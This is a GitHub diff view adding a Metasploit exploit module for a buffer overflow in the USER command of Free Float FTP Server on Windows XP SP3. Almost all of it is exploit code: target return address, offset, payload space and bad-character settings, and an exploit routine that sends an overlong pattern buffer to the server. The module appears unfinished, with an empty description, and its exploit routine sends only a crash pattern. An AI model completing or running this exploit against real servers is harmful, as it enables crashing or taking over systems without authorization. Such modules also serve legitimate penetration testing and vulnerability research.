File tree Expand file tree Collapse file tree 1 file changed +64
-0
lines changed
modules/exploits/windows/ftp Expand file tree Collapse file tree 1 file changed +64
-0
lines changed Original file line number Diff line number Diff line change
1
+ ##
2
+ # This file is part of the Metasploit Framework and may be subject to
3
+ # redistribution and commercial restrictions. Please see the Metasploit
4
+ # Framework web site for more information on licensing and terms of use.
5
+ # http://metasploit.com/framework/
6
+ ##
7
+
8
+ require 'msf/core'
9
+
10
+ class Metasploit4 < Msf ::Exploit ::Remote
11
+ Rank = LowRanking
12
+
13
+ include Msf ::Exploit ::Remote ::Ftp
14
+
15
+ def initialize ( info = { } )
16
+ super ( update_info ( info ,
17
+ 'Name' => 'Free Float FTP Server USER Command Buffer Overflow' ,
18
+ 'Description' => %q{
19
+ } ,
20
+ 'Platform' => 'win' ,
21
+ 'Author' =>
22
+ [
23
+ 'D35m0nd142' , # Original exploit
24
+ 'Doug Prostko <dougtko[at]gmail.com>' # MSF module
25
+ ] ,
26
+ 'License' => MSF_LICENSE ,
27
+ 'References' =>
28
+ [
29
+ [ 'OSVDB' , '69621' ] ,
30
+ [ 'EDB' , '23243' ]
31
+ ] ,
32
+ 'Privileged' => false ,
33
+ 'Payload' =>
34
+ {
35
+ 'Space' => 500 ,
36
+ #'DisableNops' => true,
37
+ #'BadChars' => "\x00\x0a\x0d\x20\x5c",
38
+ #'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
39
+ } ,
40
+ 'Targets' =>
41
+ [
42
+ [ 'Windows XP SP3' ,
43
+ {
44
+ 'Ret' => 0x7E379353 , # jmp esp from C:\Program Files\PMSystem\Temp\tmp0.dll
45
+ 'Offset' => 228
46
+ }
47
+ ] ,
48
+ ] ,
49
+ 'DefaultTarget' => 0 ,
50
+ 'DisclosureDate' => 'Jun 12 2012' ) )
51
+ register_options (
52
+ [
53
+ #OptAddress.new('SOURCEIP', [false, 'The local client address'])
54
+ ] , self . class )
55
+ end
56
+
57
+ def exploit
58
+ connect
59
+ buf = pattern_create ( 300 )
60
+ send_cmd ( [ 'USER ' , buf ] , false )
61
+ disconnect
62
+ end
63
+
64
+ end
You can’t perform that action at this time.
0 commit comments